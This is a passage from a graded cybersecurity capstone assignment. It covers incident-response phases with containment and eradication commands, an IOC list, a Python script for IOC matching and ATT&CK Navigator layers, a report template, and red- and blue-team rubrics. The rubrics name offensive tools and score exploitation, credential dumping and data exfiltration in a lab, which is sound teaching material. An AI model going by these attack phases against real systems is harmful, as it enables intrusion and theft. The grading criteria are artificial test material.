Objective: Execute full incident response lifecycle.

NIST PICERL Framework:

  1. Preparation (Already completed - lab setup)
  2. Identification (Completed in Phase 1)
  3. Containment (Short-term and Long-term)
  4. Eradication (Remove attacker presence)
  5. Recovery (Restore services)
  6. Lessons Learned (Post-incident review)

Tasks:

  1. Containment Actions:

    # Short-term: Isolate compromised systems
    # On pfSense, block Kali IP
    pfctl -t blocklist -T add 10.10.2.50
    
    # Disable backdoor account (it is a domain account, so act on the domain)
    net user backdoor /active:no /domain
    
    # Kill suspicious processes (on WS02)
    Get-Process | Where-Object { $_.Path -like "*\Temp\*" } | Stop-Process -Force
    
  2. Eradication:

    # Remove malware artifacts
    Remove-Item "C:\Windows\Temp\update.exe" -Force
    
    # Remove persistence mechanisms
    schtasks /delete /tn "Windows Update Check" /f
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SecurityUpdate /f
    
    # Delete backdoor account
    net user backdoor /delete /domain
    
    # Reset compromised accounts
    net user itadmin NewP@ssw0rd123! /domain
    
  3. Recovery:

    # Restore from clean snapshots (if available)
    # Rebuild compromised systems
    
    # Verify AD integrity
    dcdiag /v > dcdiag_output.txt
    repadmin /replsummary
    
    # Restrict Kerberos to AES encryption types (this does not rotate keys; reset the
    # krbtgt password twice as well so tickets forged with dumped material stop validating)
    ksetup /setenctypeattr apophis.local AES256-CTS-HMAC-SHA1-96
    
  4. Hardening Recommendations:

    • Enable LSASS protection: Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1
    • Implement tiered admin model
    • Deploy EDR solution (simulate with Sysmon)
    • Update firewall rules (segment VLANs further)

Deliverables:

  • Containment action log (timestamped)
  • Eradication checklist (completed tasks)
  • System recovery documentation
  • Hardening recommendations report (5+ actionable items)

Assessment Criteria (20pts):

  • Proper NIST PICERL execution (10pts)
  • Completeness of eradication (5pts)
  • Quality of hardening recommendations (5pts)

Investigation Phase 5: Threat Intelligence & Attribution (15 Points)

Objective: Map attack to MITRE ATT&CK and perform threat actor profiling.

Tasks:

  1. MITRE ATT&CK Mapping:

    • Create spreadsheet mapping observed TTPs to ATT&CK techniques
    • Use ATT&CK Navigator to visualize coverage
    • Identify gaps in detection coverage
  2. Threat Actor Profiling:

    # Threat Actor: SERPENT SYNDICATE (Simulated APT)
    
    **Sophistication Level**: Advanced
    
    **Observed TTPs**:
    - Initial Access: T1190 (Exploit Public-Facing Application)
    - Credential Access: T1003 (OS Credential Dumping)
    - Lateral Movement: T1021.002 (SMB/Windows Admin Shares)
    - Persistence: T1136 (Create Account), T1053 (Scheduled Task)
    - Exfiltration: T1041 (C2 Channel)
    
    **Tools Used**:
    - Metasploit Framework
    - Impacket suite
    - Mimikatz
    - Custom PowerShell scripts
    
    **Targeting**: Intellectual property theft, persistent access
    
    **Comparison**: Similar to APT29 (Cozy Bear) - use of living-off-the-land techniques
    
  3. IOC Generation for Threat Intelligence Platforms:

    indicator,type,severity,context
    10.10.2.50,ipv4,high,C2 Server
    update.exe,filename,critical,Persistent malware
    backdoor,username,critical,Rogue domain account
    "Windows Update Check",scheduled_task,high,Persistence mechanism
    C:\Windows\Temp\*,filepath,medium,Malware staging directory
    
  4. Dashboard Integration (MOD8 Link):

    • Export MITRE heatmap JSON to dashboard/src/data/live/mitre_coverage.json
    • Update threat feed with real IOCs
    • Visualize attack timeline in Incident Tracker component
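The IOC CSV in task 3 and the observed-TTP list in task 2 are the two artifacts the dashboard export in task 4 consumes, and both are simple to make machine-usable. The following Python script is an added example, not part of the capstone or the dashboard project: it parses the IOC CSV exactly as written above, matches it (with wildcard support for filepath indicators) against constructed host and network observations ordered by severity, and builds an ATT&CK Navigator layer from the observed techniques, scoring the ones a detection fired for so that detection gaps show as a second color. The Navigator/ATT&CK version numbers in the layer header and the observation records are assumptions.

```python
"""IOC matching and ATT&CK Navigator layer generation for the threat-intel phase.
Added example; observations and version numbers are constructed/assumed."""
import csv
import fnmatch
import io
import json

# The IOC CSV from task 3, verbatim
IOC_CSV = r"""indicator,type,severity,context
10.10.2.50,ipv4,high,C2 Server
update.exe,filename,critical,Persistent malware
backdoor,username,critical,Rogue domain account
"Windows Update Check",scheduled_task,high,Persistence mechanism
C:\Windows\Temp\*,filepath,medium,Malware staging directory
"""

# Constructed observations, as a host/network sweep of the lab might report them
OBSERVATIONS = [
    {"source": "zeek conn.log", "type": "ipv4", "value": "10.10.4.40"},
    {"source": "zeek conn.log", "type": "ipv4", "value": "10.10.2.50"},
    {"source": "WS02 process list", "type": "filename", "value": "update.exe"},
    {"source": "WS02 Run key", "type": "filepath", "value": r"C:\Windows\Temp\update.exe"},
    {"source": "DC01 4624", "type": "username", "value": "hruser"},
    {"source": "WS02 schtasks", "type": "scheduled_task", "value": "Windows Update Check"},
]

# Observed TTPs from the threat actor profile in task 2
OBSERVED_TTPS = {
    "T1190": "Exploit Public-Facing Application",
    "T1003": "OS Credential Dumping",
    "T1021.002": "SMB/Windows Admin Shares",
    "T1136": "Create Account",
    "T1053": "Scheduled Task",
    "T1041": "Exfiltration Over C2 Channel",
}
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def load_iocs(text):
    """Parse the indicator,type,severity,context CSV into dicts."""
    return list(csv.DictReader(io.StringIO(text)))


def match_ioc(ioc, observation):
    """Case-insensitive match; filepath indicators may carry shell-style wildcards."""
    if ioc["type"] != observation["type"]:
        return False
    indicator, value = ioc["indicator"].lower(), observation["value"].lower()
    if ioc["type"] == "filepath":
        return fnmatch.fnmatchcase(value, indicator)
    return value == indicator


def scan_observations(iocs, observations):
    """(observation, ioc) pairs for every hit, most severe first."""
    hits = [(obs, ioc) for obs in observations for ioc in iocs if match_ioc(ioc, obs)]
    hits.sort(key=lambda hit: SEVERITY_ORDER.get(hit[1]["severity"], 9))
    return hits


def navigator_layer(ttps, detected=(), name="Operation Serpent's Shadow"):
    """ATT&CK Navigator layer: score 2 = observed and detected, 1 = observed but missed."""
    return {
        "name": name,
        # assumption: versions current for the Navigator build the dashboard uses; adjust to match
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "SERPENT SYNDICATE techniques; score 1 = observed, 2 = observed and detected",
        "techniques": [
            {"techniqueID": tid, "score": 2 if tid in detected else 1, "comment": desc, "enabled": True}
            for tid, desc in ttps.items()
        ],
        "gradient": {"colors": ["#ff6666", "#8ec843"], "minValue": 1, "maxValue": 2},
    }


def detection_gaps(layer):
    """Technique IDs the actor used without any detection firing."""
    return [t["techniqueID"] for t in layer["techniques"] if t["score"] == 1]


def layer_json(layer):
    return json.dumps(layer, indent=2)


if __name__ == "__main__":
    iocs = load_iocs(IOC_CSV)
    for obs, ioc in scan_observations(iocs, OBSERVATIONS):
        print(f"[{ioc['severity']:8}] {obs['source']}: {obs['value']} -> {ioc['context']}")
    layer = navigator_layer(OBSERVED_TTPS, detected={"T1190"})
    print("detection gaps:", detection_gaps(layer))
    with open("mitre_coverage.json", "w") as fh:   # copy to dashboard/src/data/live/ for task 4
        fh.write(layer_json(layer))
```

The `detected` set is where the Phase 1 triage results feed in: every technique for which a Suricata, Zeek or event-log finding exists gets score 2, and what remains at score 1 is the detection-gap list the report asks for.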

Deliverables:

  • MITRE ATT&CK Navigator layer file (JSON)
  • Threat actor profile report (2-3 pages)
  • IOC list in STIX format (or CSV)
  • Dashboard integration (screenshot of updated heatmap)

Assessment Criteria (15pts):

  • Accurate MITRE ATT&CK mapping (7pts)
  • Threat actor profiling quality (5pts)
  • IOC quality and completeness (3pts)

Investigation Phase 6: Final IR Report (15 Points)

Objective: Create comprehensive incident response report for executive leadership.

Report Structure (Use LAB_REPORT_TEMPLATE.md as base):

# Incident Response Report: Operation Serpent's Shadow
## Security Incident #2026-001

**Classification**: CONFIDENTIAL
**Date**: [Current Date]
**Incident Handler**: [Your Name]
**Severity**: CRITICAL

---

## Executive Summary (1 page)
- **What Happened**: Brief overview of the incident
- **Impact**: Systems compromised, data exfiltrated
- **Root Cause**: Unpatched vsftpd vulnerability on legacy server
- **Remediation Status**: All threats eradicated, systems hardened
- **Recommendation**: Decommission FILE01, implement vulnerability management program

---

## Incident Timeline (2-3 pages)
| Timestamp | Event | System | Action |
|-----------|-------|--------|--------|
| 2026-02-10 14:23 | Initial scan detected | FILE01 | Suricata alert fired |
| 2026-02-10 14:45 | vsftpd exploit successful | FILE01 | Attacker gained shell |
| ... | ... | ... | ... |

---

## Technical Analysis (5-7 pages)

### Attack Chain
[Detailed walkthrough of each attack phase]

### Network Forensics
[PCAP analysis findings]

### Host Forensics
[Autopsy/Volatility findings]

### MITRE ATT&CK Mapping
[Table of techniques used]

---

## Indicators of Compromise (1 page)
[Complete IOC list]

---

## Response Actions (2-3 pages)

### Containment
[What was done to stop the attack]

### Eradication
[How threats were removed]

### Recovery
[How systems were restored]

---

## Lessons Learned (2 pages)

### What Went Well
- IDS detected initial scanning activity
- Log retention allowed full forensic analysis

### What Could Be Improved
- Delayed response to initial alerts (simulated)
- Legacy system not in patch management program
- No EDR on endpoints

### Recommendations
1. Implement 24/7 SOC monitoring
2. Deploy EDR across all endpoints
3. Decommission Metasploitable 2 (FILE01)
4. Conduct quarterly red team exercises
5. Implement tiered admin model

---

## Appendices
- Appendix A: Complete IOC List
- Appendix B: MITRE ATT&CK Navigator JSON
- Appendix C: Network Topology Diagram
- Appendix D: Forensic Evidence Inventory

Deliverables:

  • Final IR report (PDF, 15-20 pages)
  • Executive briefing (PowerPoint, 5-7 slides)
  • Complete evidence package (ZIP archive)
  • Post-incident review presentation

Assessment Criteria (15pts):

  • Report professionalism and completeness (7pts)
  • Technical accuracy (5pts)
  • Actionable recommendations (3pts)

Final Deliverables Checklist

Red Team Package (50 Points)

  • Attack command logs (script output)
  • Screenshots (minimum 15)
  • Red Team report (PDF)
  • MITRE ATT&CK Navigator JSON
  • IOC list (CSV)
  • Exfiltrated data samples

Blue Team Package (50 Points)

  • Investigation logs
  • Forensic images (disk + memory)
  • PCAP files with annotations
  • Incident Response report (PDF)
  • Executive briefing (PPTX)
  • Remediation documentation
  • Dashboard integration (screenshots)

Submission Format

Create ZIP archive: CAPSTONE_YourName_OperationSerpentsShadow.zip

CAPSTONE_YourName_OperationSerpentsShadow/
├── 01_Red_Team/
│   ├── logs/
│   ├── screenshots/
│   ├── loot/
│   ├── exfil/
│   ├── RedTeam_Report.pdf
│   └── MITRE_ATT&CK_Layer.json
├── 02_Blue_Team/
│   ├── forensics/
│   ├── pcaps/
│   ├── logs/
│   ├── IR_Report.pdf
│   ├── Executive_Briefing.pptx
│   └── Remediation_Plan.md
└── README.md (submission summary)

Assessment Rubric

Red Team Assessment (100 Points)

| Phase | Criteria | Points |
|-------|----------|--------|
| Phase 1: Recon | Service enumeration completeness | 10 |
| Phase 2: Initial Access | Successful exploitation | 15 |
| Phase 3: Credential Access | Multiple credential sources | 15 |
| Phase 4: Lateral Movement | Domain system compromise | 20 |
| Phase 5: Privilege Escalation | Domain Admin achieved | 20 |
| Phase 6: Exfiltration | Data extraction success | 10 |
| Phase 7: Reporting | Documentation quality | 10 |

Blue Team Assessment (100 Points)

| Phase | Criteria | Points |
|-------|----------|--------|
| Phase 1: Detection | Alert triage accuracy | 15 |
| Phase 2: Network Forensics | PCAP analysis quality | 15 |
| Phase 3: Host Forensics | Disk/memory analysis | 20 |
| Phase 4: Incident Response | NIST PICERL execution | 20 |
| Phase 5: Threat Intelligence | MITRE ATT&CK mapping | 15 |
| Phase 6: Final Report | Professional documentation | 15 |

Total: 200 Points

Grading Scale:

  • 180-200: Exceptional (A)
  • 160-179: Excellent (B)
  • 140-159: Good (C)
  • Below 140: Needs Improvement (Resubmit)

Additional Resources

  • MITRE ATT&CK Framework: https://attack.mitre.org
  • NIST SP 800-61r2 (Incident Response Guide)
  • SANS Incident Response Poster
  • Red Team Field Manual (RTFM)
  • Blue Team Field Manual (BTFM)

Tools Reference

  • Red Team: Metasploit, Impacket, Mimikatz, BloodHound, CrackMapExec
  • Blue Team: Volatility 3, Autopsy, Wireshark, Zeek, Suricata, KQL

Dashboard Integration

  • Export MITRE coverage: dashboard/src/data/live/mitre_coverage.json
  • Update threat feed: dashboard/src/data/live/threat_feed.json
  • Timeline visualization: Use Recharts LineChart component

Post-Capstone Next Steps

After completing this capstone:

  1. Rebuild Lab Environment: Reset all VMs to clean state
  2. Apply Hardening: Implement your own remediation recommendations
  3. Re-Attack: Attempt the same attack chain - what changed?
  4. Advanced Scenarios: Try different attack paths (web app → AD, phishing simulation)
  5. Contribute to Dashboard: Add real detection logic to React components

Academic Integrity Statement

This capstone represents your own work and understanding of offensive and defensive security operations. You may use:

  • Official tool documentation
  • MITRE ATT&CK knowledge base
  • Course module materials (MOD0-MOD8)

You may NOT:

  • Copy attack scripts without understanding them
  • Use automated red team frameworks (Cobalt Strike, Covenant) - manual techniques only
  • Plagiarize reports from online sources

Authorized Use Only: These techniques are for educational purposes in a controlled lab environment. Unauthorized use against systems you do not own or have explicit permission to test is illegal.


Contact & Support

For technical issues:

  • Review module materials (MOD0-MOD8)
  • Check LAB_REPORT_TEMPLATE.md for report formatting
  • Consult ASSESSMENT_RUBRICS.md for grading criteria

Good luck, and remember: "Order from Chaos" 🐍


END OF CAPSTONE PROJECT